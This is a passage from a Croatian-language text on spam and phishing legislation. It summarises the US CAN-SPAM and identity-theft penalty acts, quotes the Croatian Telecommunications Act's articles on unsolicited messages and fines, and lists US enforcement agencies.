CAN-SPAM akt (engl. The Controlling the Assault of Non-Solicited Pornography And Marketing Act) je potpisan od strane predsjednika Bush-a 16. prosinca 2003. godine i postao zakonom 1. siječnja 2004 [7]. Odnosi se na sprečavanje pošiljatelja komercijalnih e-mailova od zavaravanja primatelja o izvoru i sadržaju e-mail poruke i obvezu pošiljatelja poruke da omogući primatelju otkazivanje primanja dodatnih poruka. Akt uključuje i zabrane protiv lažnog slanja informacija, zabranu protiv lažnih subjekt zaglavlja, obavezno uključivanje povratne adrese unutar poruke, zabranu slanja poruka nakon prigovora korisnika, obavezu pružanja mogućnosti odbijanja primanja daljnjih e-mail poruka od pošiljatelja, obavezno uključivanje pošiljateljeve fizičke adrese, zabranu slanja spam poruka prema zaštićenim računalima, zabranu korištenja automatske registracije nekoliko e-mail adresa radi masovnog slanja e-mail poruka i dr. Akt propisuje različite kazne za prekršitelje kao primjerice dvije godine zatvorske kazne za namjeran prijenos, posjedovanje ili korištenje bez zakonske ovlasti identifikacijska sredstva druge osobe. Akt zahtjeva od Saveznog trgovinskog povjerenstva (engl. Federal Trade Comission – FTC) da definira kriterije koji omogućuju utvrđivanje primarne svrhe elektroničke poruke. U neku ruku akt daje smjernice tvrtkama koje žele slati komercijalnu elektroničku poštu. To je bila i glavna kritika akta nakon njegovog potpisivanja. Anti-spam aktivisti bili su duboko razočarani činjenicom da akt daje savezno odobrenje praksi slanja spam-a. U veljači 2005. ‘‘New York Times’‘ objavio je članak u kojem Steve Linford, osnivač ‘‘Spamhaus’‘ projekta, vodeće anti-spam organizacije, govori kako CAN-SPAM akt legalizira slanje spam poruka. Nadalje, federalni CAN-SPAM akt odbacuje državne zakone koji u mnogim slučajevima imaju strože mjere protiv spam poruka. Dokazano je da je učinkovitost akta minimalna. Prema New York Times-u nakon potpisivanja akta spam poruke obuhvaćale su 80 % svih e-mail poruka, a prije akta 50 - 60% (Zeller).

5.2 Akt poboljšanja kazni za krađu identiteta

Predsjednik Bush 15.srpnja 2004. potpisao je akt poboljšanja kazni za krađu identiteta (engl. Identity Theft Penalty Enhancement Act – ITPEA) koji jasno govori da će osoba koja krši tuđu financijsku privatnost biti kažnjena. Akt je usmjeren prema borbi protiv krađe identiteta na taj način da povećava kazne za krađu identiteta povezane sa zločinom otežane krađe identiteta koji je definiran kao korištenje ukradenog identiteta za počinjavanje ostalih zločina, uključujući phishing. Zakon propisuje minimalnu kaznu zatvora od dvije godine bez Mogućnosti uvjetnog puštanja na slobodu za svjesno korištenje ukradenog identiteta. 2005. godine stupio je na snagu anti-phishing akt koji štiti integritet Interneta čineći ilegalnim slanje poruka koje sadrže linkove na lažirane Internet stranice.

6 Zakonodavstvo u Hrvatskoj

Donošenjem novog Zakona o telekomunikacijama ove godine, u Hrvatskoj je po prvi put zakonski uređena ova problematika. Članak 111. definirao je što se smatra spamom (neželjenim telekomunikacijskim priopćenjima), uvjete pod kojima se i na koji način takva priopćenja mogu odašiljati, te za prekršitelje predvidio i određene sankcije (članak 116. st. 40). [13]

6.1 Neželjena telekomunikacijska priopćenja

Članak 111.

(1) ''Uporaba pozivnih sustava s i bez ljudskog posredovanja, telefaks uređaja ili elektroničke pošte u svrhu izravne promidžbe dopuštena je samo uz prethodno pribavljenu privolu korisnika usluga.''

Zakonska regulativa odnosi se ne samo na elektroničku poštu, već i na govorne automate, promidžbene telefonske pozive (tzv. telemarketing), te promidžbu putem telefaks uređaja. Zahtijeva se prethodno pribavljena privola korisnika usluga. U praksi to znači da osobu, uz neke iznimke, niti telefonom, niti faksom niti e-mailom, a u reklamne svrhe, ne može kontaktirati nitko kome to ta osoba nije to prethodno dozvolila.
Sam čin pribavljanja pristanka osobe na primanje promidžbenih poruka, ne može biti obavljen nekim od tih sredstava. U praksi to znači da ukoliko korisnik primi e-mail poruku, faks ili telefonski poziv u kojem se od njega traži sama privola, takvo telekomunikacijsko priopćenje takožđer je nedopušteno.

U zakonu je to izraženo ovako:

(2) ''Primjena tehničkih sustava za pribavljanje privole iz stavka 1. ovoga članka smatra se izravnom promidžbom i nije dopuštena.''

Ukoliko je potrošač prilikom pribavljanja nekog proizvoda ostavio trgovcu svoje podatke (e-mail adresu), te nije unaprijed odbio mogućnost primanja reklamnih poruka od strane trgovca, tako poslane poruke u sebi moraju sadržavati mogućnost jednostavnog i besplatnog prigovora na primanje takvih poruka. Zakon doduše ne precizira radi li se o automatskom ili "ručnom" sustavu za uklanjanje sa takvih lista, no i da korisnik primi takvu reklamnu poruku, jednom kada pošiljateljima pošalje odgovor sa naznakom da takve poruke ne želi, sve što kasnije primi predstavlja kršenje zakona. Važno je također naglasiti da trgovac takve promidžbene poruke može slati samo za promociju vlastitih proizvoda ili usluga, što dakle isključuje mogućnost razmjene elektoničkih adresa među trgovcima.

(3) ''Fizička ili pravna osoba trgovac može se koristiti podacima o elektroničkim adresama, dobivenim od svojih potrošača u svrhu prodaje proizvoda i usluga, za izravnu promidžbu samo vlastitih sličnih proizvoda ili usluga, uz uvjet da ti potrošači imaju jasnu mogućnost besplatnog i jednostavnog prigovora na takvu uporabu podataka o elektroničkim adresama prigodom njihova prikupljanja i prigodom primitka svake poruke, u slučaju da potrošač nije unaprijed odbio takvu uporabu podataka.''

Poruke elektoničke pošte ne smiju biti poslane sa adresa u kojima se pogrešno prikazuje ili prikriva identitet pošiljatelja (dakle sa tuđih ili lažnih e-mail adresa), odnosno sa nepostojećih e-mail adresa:

(4) ''Nije dopušteno, u svrhu izravne promidžbe, slanje elektroničke pošte u kojoj se pogrješno prikazuje ili prikriva identitet pošiljatelja u čije ime se šalje priopćenje, ili bez ispravne elektroničke adrese na koju primatelj može, bez naknade, poslati zahtjev za onemogućavanje takvih priopćenja.''

(5) ''Odredbe iz stavka 1. i 3. ovoga članka ne primjenjuju se na neautomatizirane pozive pravnim osobama u svrhu izravne promidžbe.''

Promidžbene poruke moraju biti poslane sa pravih (relevantnih) e-mail adresa, isključivo osobama koje su na to pristale odnosno takve poruke zatražile. Ukoliko se radi o pošiljatelju - trgovcu (pravnoj ili fizičkoj osobi), promidžbene poruke mogu se odnositi samo na njegove proizvode i usluge. Svaka poslana poruka u sebi mora sadržavati i mogućnost jasnog i jednostavnog prigovora odnosno uklanjanja određene e-mail adrese sa liste primatelja promidžbenih poruka.

Članak 116.

(1) ''Novčanom kaznom od 5.000,00 do 1.000.000,00 kuna kaznit će se za prekršaj pravna osoba: (...)

42. ako upotrebljava pozivne sustave s i bez ljudskog posredovanja, telefaks uređaje ili elektroničku poštu u svrhu izravne promidžbe protivno odredbama iz članka 111. ovoga Zakona, (...)''

(2) ''Za prekršaj iz stavka 1. ovoga članka kaznit će se i odgovorna osoba u pravnoj osobi novčanom kaznom od 1.000,00 do 10.000,00 kuna.''

(3) ''Iznimno od odredbe iz stavka 2. ovoga članka, ako je odgovorna osoba prekršaj počinila s namjerom, kaznit će se novčanom kaznom od 3.000,00 do 10.000,00 kuna.''

(4) ''Ako prekršaj iz stavka 1. ovoga članka počini fizička osoba, kaznit će se novčanom kaznom od 1.000,00 do 10.000,00 kuna.''

(5) '' Za prekršaj iz stavka 1. ovoga članka može se izreći i zaštitna mjera zabrane obavljanja djelatnosti u trajanju od tri mjeseca do godine dana, a za prekršaj iz stavka 1. točke 42. ovoga članka može se izreći i zaštitna mjera oduzimanja računalne i/ili druge tehničke opreme.''

(6) ''Imovinska korist ostvarena prekršajem oduzet će se.''

Na kraju treba dodati da se primjena ovog članka zakona odnosi na fizičke i pravne osobe unutar Republike Hrvatske, te da se kao takva ne može protezati i na elektoničke poruke koje stižu sa područja izvan granica Republike Hrvatske. Ipak za nadati se je da će, razvojem svijesti o problemu spam-a, i u zakonodavstvima drugih zemalja porasti pravna regulativa ovog problema.

7 Agencije za provedbu prava

Savezno trgovinsko povjerenstvo [8]

Savezno trgovinsko povjerenstvo odgovorno je za zaštitu potrošača sprečavajući neovlaštene, prevarljive i nepravedne poslovne postupke na tržištu osiguravajući potrošačima informaciju koja će pomoći uočiti, spriječiti ili izbjeći iste. Sadrži stranicu OnGuardOnline.gov koja pruža praktične savjete koji pomažu borbi protiv prijevare na Internetu i štiti potrošačevo računalo i štite osobne informacije.

Ministarstvo pravosuđa

Federalni tužitelji rade s federalnim istražnih agencijama kao što su: FBI, tajne službe i poštanske kontrolne službe u cilju progonjenja kradljivaca identiteta i slučajeva prijevare.

FBI [10]

FBI (engl. Federal Bureau of Investigation) odgovoran je za istraživanje Internet prijetnji koje uključuju krađu intelektualnog vlasništva, online sexualno iskorištavanje djece i Internet prijevare. Partner je s agencijama koje se bave zaprimljenim pritužbama vezanim uz kriminalne radnje na Internetu.

Tajne službe

Tajne službe istražuju zločine povezane s financijskim institucijama.